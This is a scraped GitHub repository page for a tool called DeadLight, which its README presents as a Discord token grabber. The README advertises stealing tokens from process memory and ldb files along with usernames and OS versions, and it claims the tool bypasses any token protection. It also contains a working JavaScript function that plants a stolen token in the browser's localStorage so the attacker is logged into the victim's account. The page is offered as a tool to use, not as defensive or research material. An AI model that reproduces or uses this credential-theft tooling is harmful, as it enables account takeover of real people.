Skip to content

ZeroMemoryEx/DeadLight

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 

Repository files navigation

Discord-Token-Grabber

Token-Stealer

Features

  • Steal
    • Token directly From memory
    • Token from ldb files
    • username
    • os version
    • bypass any kind of token protection

How to login using token

function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
  • use login("token"); then refresh the webpage ,and you will login automatically to the account using only token